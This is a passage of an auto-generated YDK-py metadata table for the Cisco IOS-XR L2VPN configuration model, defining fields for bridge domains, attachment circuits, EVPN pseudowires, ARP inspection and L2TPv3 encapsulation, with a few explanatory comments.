[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bdac-storm-control-types', REFERENCE_CLASS, 'BdacStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
[], [],
''' Storm Control
''',
'bdac_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai', REFERENCE_CLASS, 'InterfaceDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
[], [],
''' L2 Interface Dynamic ARP Inspection
''',
'interface_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Flooding
''',
'interface_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Unknown Unicast
Flooding
''',
'interface_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an IGMP Snooping profile
''',
'interface_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-ip-source-guard', REFERENCE_CLASS, 'InterfaceIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
[], [],
''' IP Source Guard
''',
'interface_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac', REFERENCE_CLASS, 'InterfaceMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
[], [],
''' MAC configuration commands
''',
'interface_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an MLD Snooping profile
''',
'interface_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-profile', REFERENCE_CLASS, 'InterfaceProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
[], [],
''' Attach a DHCP profile
''',
'interface_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('split-horizon', REFERENCE_CLASS, 'SplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
[], [],
''' Split Horizon
''',
'split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-mac-addresses', REFERENCE_CLASS, 'StaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
False,
[
_MetaInfoClassMember('bd-attachment-circuit', REFERENCE_LIST, 'BdAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
[], [],
''' Name of the Attachment Circuit
''',
'bd_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
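        # EVPN pseudowire entries: each 'bd-pseudowire-evpn' is keyed by an
        # Ethernet VPN ID (eviid, 1..65534) together with an AC ID (acid,
        # 1..4294967295).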
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
False,
[
_MetaInfoClassMember('bd-pseudowire-evpn', REFERENCE_LIST, 'BdPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
[], [],
''' EVPN Pseudowire configuration
''',
'bd_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
False,
[
_MetaInfoClassMember('dai-address-validation', REFERENCE_CLASS, 'DaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
[], [],
''' Address Validation
''',
'dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Dynamic ARP Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Routed Interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
False,
[
_MetaInfoClassMember('routed-interface', REFERENCE_LIST, 'RoutedInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
[], [],
''' Bridge Domain Routed Interface
''',
'routed_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
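        # The aggregate BridgeDomain entry below ties the preceding subtrees
        # together (attachment circuits, pseudowires, EVPN pseudowires, storm
        # control, DAI, IP source guard, routed interfaces). As a minimal, hedged
        # sketch of how this table is consumed -- assuming the enclosing dict is
        # named _meta_table, as in typical ydk-py generated meta modules -- a
        # resolver could look an entry up by its dotted class path:
        #
        #     def lookup_meta(path):
        #         """Return the _MetaInfoClass registered for a dotted path."""
        #         return _meta_table[path]['meta_info']
        #
        #     bd_meta = lookup_meta('L2Vpn.Database.BridgeDomainGroups.'
        #                           'BridgeDomainGroup.BridgeDomains.BridgeDomain')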
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Name of the bridge domain
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-attachment-circuits', REFERENCE_CLASS, 'BdAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
[], [],
''' Attachment Circuit table
''',
'bd_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowire-evpns', REFERENCE_CLASS, 'BdPseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
[], [],
''' List of EVPN pseudowires
''',
'bd_pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pseudowires', REFERENCE_CLASS, 'BdPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
[], [],
''' List of pseudowires
''',
'bd_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-storm-controls', REFERENCE_CLASS, 'BdStormControls' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
[], [],
''' Storm Control
''',
'bd_storm_controls',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-evis', REFERENCE_CLASS, 'BridgeDomainEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
[], [],
''' Bridge Domain EVI Table
''',
'bridge_domain_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mac', REFERENCE_CLASS, 'BridgeDomainMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
[], [],
''' MAC configuration commands
''',
'bridge_domain_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-mtu', ATTRIBUTE, 'int' , None, None,
[('46', '65535')], [],
''' Maximum transmission unit for this Bridge
Domain
''',
'bridge_domain_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-pbb', REFERENCE_CLASS, 'BridgeDomainPbb' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
[], [],
''' Bridge Domain PBB
''',
'bridge_domain_pbb',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('coupled-mode', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Coupled-mode configuration
''',
'coupled_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dai', REFERENCE_CLASS, 'Dai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
[], [],
''' Dynamic ARP Inspection
''',
'dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('dhcp', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' DHCPv4 Snooping profile name
''',
'dhcp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable flooding
''',
'flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flooding-unknown-unicast', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Unknown Unicast flooding
''',
'flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach IGMP Snooping Profile Name
''',
'igmp_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('igmp-snooping-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable IGMP Snooping
''',
'igmp_snooping_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ip-source-guard', REFERENCE_CLASS, 'IpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
[], [],
''' IP Source Guard
''',
'ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('member-vnis', REFERENCE_CLASS, 'MemberVnis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
[], [],
''' Bridge Domain VxLAN Network Identifier
Table
''',
'member_vnis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mld-snooping', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach MLD Snooping Profile Name
''',
'mld_snooping',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('nv-satellite', REFERENCE_CLASS, 'NvSatellite' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
[], [],
''' nV Satellite
''',
'nv_satellite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('routed-interfaces', REFERENCE_CLASS, 'RoutedInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
[], [],
''' Bridge Domain Routed Interface Table
''',
'routed_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Shut down the Bridge Domain
''',
'shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'BridgeDomainTransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BridgeDomainTransportModeEnum',
[], [],
''' Bridge Domain Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfis', REFERENCE_CLASS, 'Vfis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
[], [],
''' Specify the virtual forwarding interface
name
''',
'vfis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
False,
[
_MetaInfoClassMember('bridge-domain', REFERENCE_LIST, 'BridgeDomain' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
[], [],
                ''' Bridge Domain
''',
'bridge_domain',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domains',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Bridge group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domains', REFERENCE_CLASS, 'BridgeDomains' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
[], [],
                ''' List of Bridge Domains
''',
'bridge_domains',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups',
False,
[
_MetaInfoClassMember('bridge-domain-group', REFERENCE_LIST, 'BridgeDomainGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
[], [],
''' Bridge group
''',
'bridge_domain_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
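    # Editorial note (an assumption about this generated module, not stated in
    # it): each entry in this table maps a YANG schema path to the
    # _MetaInfoClass describing its keys, leafs and child containers; YDK-py
    # generated classes conventionally resolve their metadata from a table
    # like this one through their _meta_info() hook.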
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'L2Tpv3SequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Tpv3SequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
False,
[
_MetaInfoClassMember('type-of-service-mode', REFERENCE_ENUM_CLASS, 'TypeOfServiceModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TypeOfServiceModeEnum',
[], [],
''' Type of service mode
''',
'type_of_service_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service-value', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Type of service value
''',
'type_of_service_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'type-of-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
False,
[
_MetaInfoClassMember('l2tpv3-class-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Name of the L2TPv3 class
''',
'l2tpv3_class_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('protocol', REFERENCE_ENUM_CLASS, 'L2TpSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpSignalingProtocolEnum',
[], [],
''' L2TPv3 signaling protocol
''',
'protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable path MTU
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('max-path-mtu', ATTRIBUTE, 'int' , None, None,
[('68', '65535')], [],
''' Maximum path maximum transmission unit
''',
'max_path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'path-mtu',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
False,
[
_MetaInfoClassMember('cookie-size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Cookie size
''',
'cookie_size',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('df-bit-set', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Set the Do Not Fragment (DF) bit to 1
''',
'df_bit_set',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2TPv3 encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
